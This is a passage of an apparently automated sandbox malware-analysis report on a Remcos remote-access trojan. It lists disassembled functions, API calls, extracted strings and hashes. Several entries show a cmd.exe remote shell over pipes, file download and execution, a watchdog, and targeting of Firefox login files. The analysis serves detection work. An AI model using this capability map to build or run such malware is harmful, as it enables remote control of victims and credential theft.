                                                        • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 538 4485e6-4485fa 539 448607-448622 LoadLibraryExW 538->539 540 4485fc-448605 538->540 542 448624-44862d GetLastError 539->542 543 44864b-448651 539->543 541 44865e-448660 540->541 544 44863c 542->544 545 44862f-44863a LoadLibraryExW 542->545 546 448653-448654 FreeLibrary 543->546 547 44865a 543->547 548 44863e-448640 544->548 545->548 546->547 549 44865c-44865d 547->549 548->543 550 448642-448649 548->550 549->541 550->549
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                        • GetLastError.KERNEL32(?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3177248105-0
                                                        • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                        • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                        • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                        • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 551 448c33-448c55 call 44854a 553 448c5a-448c61 551->553 554 448c63-448c88 553->554 555 448c8a-448ca4 call 448cbb LCMapStringW 553->555 559 448caa-448cb8 call 43502b 554->559 555->559
                                                        APIs
                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,A4E85006,00000001,?,0043CEA5), ref: 00448CA4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: String
                                                        • String ID: LCMapStringEx$PkGNG
                                                        • API String ID: 2568140703-1065776982
                                                        • Opcode ID: 86a11f55cf6387bee299305d7f05c1eeea946d3ceab5384c32c6ec147cd8a697
                                                        • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                        • Opcode Fuzzy Hash: 86a11f55cf6387bee299305d7f05c1eeea946d3ceab5384c32c6ec147cd8a697
                                                        • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 563 40d0a4-40d0d0 call 401fab CreateMutexA GetLastError
                                                        APIs
                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                        • GetLastError.KERNEL32 ref: 0040D0BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateErrorLastMutex
                                                        • String ID: SG
                                                        • API String ID: 1925916568-3189917014
                                                        • Opcode ID: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                                        • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                        • Opcode Fuzzy Hash: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                                        • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 566 44ee44-44ee78 GetCPInfo 567 44ef6e-44ef7b 566->567 568 44ee7e 566->568 569 44ef81-44ef91 567->569 570 44ee80-44ee8a 568->570 571 44ef93-44ef9b 569->571 572 44ef9d-44efa4 569->572 570->570 573 44ee8c-44ee9f 570->573 574 44efb0-44efb2 571->574 575 44efb4 572->575 576 44efa6-44efad 572->576 577 44eec0-44eec2 573->577 580 44efb6-44efc5 574->580 575->580 576->574 578 44eec4-44eefb call 4511ac call 44aee6 577->578 579 44eea1-44eea8 577->579 591 44ef00-44ef2b call 44aee6 578->591 581 44eeb7-44eeb9 579->581 580->569 583 44efc7-44efd7 call 43502b 580->583 584 44eeaa-44eeac 581->584 585 44eebb-44eebe 581->585 584->585 588 44eeae-44eeb6 584->588 585->577 588->581 594 44ef2d-44ef37 591->594 595 44ef47-44ef49 594->595 596 44ef39-44ef45 594->596 598 44ef60 595->598 599 44ef4b-44ef50 595->599 597 44ef57-44ef5e 596->597 600 44ef67-44ef6a 597->600 598->600 599->597 600->594 601 44ef6c 600->601 601->583
                                                        APIs
                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Info
                                                        • String ID:
                                                        • API String ID: 1807457897-3916222277
                                                        • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                        • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                        • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                        • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 602 448b04-448b32 call 44854a 605 448b34-448b47 602->605 606 448b49-448b4f InitializeCriticalSectionAndSpinCount 602->606 607 448b55-448b63 call 43502b 605->607 606->607
                                                        APIs
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                        Strings
                                                        • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpin
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 2593887523-3084827643
                                                        • Opcode ID: e7865eab5a0c5ee74c944b46d32e98b8efcd507c693a88801e0629148af4ccbf
                                                        • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                        • Opcode Fuzzy Hash: e7865eab5a0c5ee74c944b46d32e98b8efcd507c693a88801e0629148af4ccbf
                                                        • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 612 448790-4487b2 call 44854a 614 4487b7-4487be 612->614 615 4487c0-4487cd 614->615 616 4487cf TlsAlloc 614->616 617 4487d5-4487e3 call 43502b 615->617 616->617
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        • API ID: Alloc
                                                        • String ID: FlsAlloc
                                                        • API String ID: 2773662609-671089009
                                                        • Opcode ID: ceb6eb44fdb2e1caf22400305205ab7015617d2dc64213a21c59039fb0580a8a
                                                        • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                        • Opcode Fuzzy Hash: ceb6eb44fdb2e1caf22400305205ab7015617d2dc64213a21c59039fb0580a8a
                                                        • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE

                                                        Control-flow Graph
                                                        • control_flow_graph 622 438e14-438e29 call 438cf3 624 438e2e-438e35 622->624 625 438e37-438e45 call 434c2d 624->625 626 438e46-438e48 TlsAlloc 624->626
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        • API ID: try_get_function
                                                        • String ID: FlsAlloc
                                                        • API String ID: 2742660187-671089009
                                                        • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                        • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                                        • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                        • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE

                                                        Control-flow Graph
                                                        • control_flow_graph 630 44f199-44f1bd call 44ed6c 633 44f1cd-44f1d4 630->633 634 44f1bf-44f1c8 call 44eddf 630->634 636 44f1d7-44f1dd 633->636 641 44f37a-44f389 call 43502b 634->641 638 44f1e3-44f1ef 636->638 639 44f2cd-44f2ec call 436f10 636->639 638->636 642 44f1f1-44f1f7 638->642 648 44f2ef-44f2f4 639->648 645 44f2c5-44f2c8 642->645 646 44f1fd-44f203 642->646 647 44f379 645->647 646->645 650 44f209-44f215 IsValidCodePage 646->650 647->641 651 44f2f6-44f2fb 648->651 652 44f32b-44f335 648->652 650->645 653 44f21b-44f228 GetCPInfo 650->653 654 44f2fd-44f303 651->654 655 44f328 651->655 652->648 658 44f337-44f35e call 44ed2e 652->658 656 44f2b2-44f2b8 653->656 657 44f22e-44f24f call 436f10 653->657 660 44f31c-44f31e 654->660 655->652 656->645 661 44f2ba-44f2c0 call 44eddf 656->661 669 44f251-44f258 657->669 670 44f2a2 657->670 671 44f35f-44f36e 658->671 666 44f305-44f30b 660->666 667 44f320-44f326 660->667 673 44f376-44f377 661->673 666->667 672 44f30d-44f318 666->672 667->651 667->655 674 44f25a-44f25f 669->674 675 44f27b-44f27e 669->675 677 44f2a5-44f2ad 670->677 671->671 676 44f370-44f371 call 44ee44 671->676 672->660 673->647 674->675 678 44f261-44f267 674->678 680 44f283-44f28a 675->680 676->673 677->676 681 44f26f-44f271 678->681 680->680 682 44f28c-44f2a0 call 44ed2e 680->682 683 44f273-44f279 681->683 684 44f269-44f26e 681->684 682->677 683->674 683->675 684->681
                                                        APIs
                                                          • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                        • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        • API ID: CodeInfoPageValid
                                                        • String ID:
                                                        • API String ID: 546120528-0
                                                        • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                        • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                        • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                        • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99

                                                        Control-flow Graph
                                                        • control_flow_graph 687 44efd8-44f002 call 448295 call 44f0f7 call 44ed6c 694 44f004-44f006 687->694 695 44f008-44f01d call 4461b8 687->695 696 44f05b-44f05e 694->696 699 44f04d 695->699 700 44f01f-44f035 call 44f199 695->700 701 44f04f-44f05a call 446802 699->701 704 44f03a-44f040 700->704 701->696 706 44f042-44f047 call 44062d 704->706 707 44f05f-44f063 704->707 706->699 709 44f065 call 4446b7 707->709 710 44f06a-44f075 707->710 709->710 713 44f077-44f081 710->713 714 44f08c-44f0a6 710->714 713->714 716 44f083-44f08b call 446802 713->716 714->701 715 44f0a8-44f0af 714->715 715->701 717 44f0b1-44f0c8 call 44ec42 715->717 716->714 717->701 722 44f0ca-44f0d4 717->722 722->701
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                          • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                          • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                          • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                        • _free.LIBCMT ref: 0044F050
                                                        • _free.LIBCMT ref: 0044F086
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        • API ID: _free$ErrorLast_abort
                                                        • String ID:
                                                        • API String ID: 2991157371-0
                                                        • Opcode ID: e5cd2967445071e6bfe31aa1a48247ff35ff00e78bbd9f02ad68eb6c8bd53105
                                                        • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                        • Opcode Fuzzy Hash: e5cd2967445071e6bfe31aa1a48247ff35ff00e78bbd9f02ad68eb6c8bd53105
                                                        • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58

                                                        Control-flow Graph
                                                        • control_flow_graph 723 44854a-448574 724 448576-448578 723->724 725 4485df 723->725 726 44857e-448584 724->726 727 44857a-44857c 724->727 728 4485e1-4485e5 725->728 729 448586-448588 call 4485e6 726->729 730 4485a0 726->730 727->728 733 44858d-448590 729->733 732 4485a2-4485a4 730->732 734 4485a6-4485b4 GetProcAddress 732->734 735 4485cf-4485dd 732->735 736 4485c1-4485c7 733->736 737 448592-448598 733->737 738 4485b6-4485bf call 434591 734->738 739 4485c9 734->739 735->725 736->732 737->729 740 44859a 737->740 738->727 739->735 740->730
                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        • API ID: AddressProc__crt_fast_encode_pointer
                                                        • String ID:
                                                        • API String ID: 2279764990-0
                                                        • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                        • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                        • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                        • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                        • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                        • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                        • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                        APIs
                                                          • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                        • String ID:
                                                        • API String ID: 806969131-0
                                                        • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                        • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                        • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                        • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                        • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                        • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                        • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                        APIs
                                                        • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                        • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                          • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                                          • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                                          • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                                          • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                                          • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                        • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                        • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                          • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                          • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                          • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                          • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                        • Sleep.KERNEL32(000007D0), ref: 00408733
                                                        • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                          • Part of subcall function 0041CA73: SystemParametersInfoW.USER32 ref: 0041CB68
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                        • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                        • API String ID: 1067849700-181434739
                                                        • Opcode ID: 386568ea35fe2c71690d1af1043c536d771b930e6ed81d06046e5373954323ac
                                                        • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                        • Opcode Fuzzy Hash: 386568ea35fe2c71690d1af1043c536d771b930e6ed81d06046e5373954323ac
                                                        • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 004056E6
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • __Init_thread_footer.LIBCMT ref: 00405723
                                                        • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                        • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                        • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                        • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                        • CloseHandle.KERNEL32 ref: 00405A23
                                                        • CloseHandle.KERNEL32 ref: 00405A2B
                                                        • CloseHandle.KERNEL32 ref: 00405A3D
                                                        • CloseHandle.KERNEL32 ref: 00405A45
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                        • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                        • API String ID: 2994406822-18413064
                                                        • Opcode ID: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                                        • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                        • Opcode Fuzzy Hash: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                                        • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                          • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                          • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                          • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                        • OpenMutexA.KERNEL32 ref: 00412181
                                                        • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                        • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                        • API String ID: 3018269243-13974260
                                                        • Opcode ID: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                                        • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                        • Opcode Fuzzy Hash: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                                        • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                        • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                        • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        • API ID: Find$CloseFile$FirstNext
                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                        • API String ID: 1164774033-3681987949
                                                        • Opcode ID: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                                        • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                        • Opcode Fuzzy Hash: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
